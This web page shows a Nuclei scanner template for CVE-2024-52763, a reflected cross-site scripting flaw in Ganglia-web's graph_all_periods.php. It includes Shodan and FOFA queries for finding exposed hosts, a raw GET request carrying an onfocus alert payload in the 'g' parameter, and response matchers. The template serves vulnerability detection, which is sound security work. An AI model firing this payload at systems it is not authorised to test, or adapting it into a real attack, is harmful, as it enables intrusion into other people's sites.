Skip to content

Ganglia Web Interface (v3.7.3 - v3.7.5) - Cross-Site Scripting

ID: CVE-2024-52763

Severity: medium

Author: DhiyaneshDK

Tags: cve,cve2024,xss,ganglia

A cross-site scripting (XSS) vulnerability in the component /graph_all_periods.php of Ganglia-web v3.73 to v3.75 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the “g” parameter.

id: CVE-2024-52763
info:
name: Ganglia Web Interface (v3.7.3 - v3.7.5) - Cross-Site Scripting
author: DhiyaneshDK
severity: medium
description: |
A cross-site scripting (XSS) vulnerability in the component /graph_all_periods.php of Ganglia-web v3.73 to v3.75 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the "g" parameter.
reference:
- https://github.com/ganglia/ganglia-web/issues/382
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2024-52763
cwe-id: CWE-79
epss-score: 0.00045
epss-percentile: 0.16715
cpe: cpe:2.3:a:ganglia:ganglia-web:*:*:*:*:*:*:*:*
metadata:
vendor: ganglia
product: ganglia-web
shodan-query: http.html:"ganglia_form.submit()"
fofa-query: body="ganglia_form.submit()"
tags: cve,cve2024,xss,ganglia
http:
- raw:
- |
GET /ganglia/graph_all_periods.php?g=%22%22%20autofocus%20onfocus=alert(document.domain)//%22 HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"" autofocus onfocus=alert(document.domain)//"'
- 'metricActions'
condition: and
- type: word
part: content_type
words:
- "text/html"
# digest: 4b0a00483046022100c01203313065fabdcc69cca39cf7a931b926e261de7ef9a094413f36fe2c2c54022100de6ccc0c3807608f96a9b5bb206c1f8c14ad9b12ab8ee21bedeff060db23d8b7:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-52763.yaml"

View on Github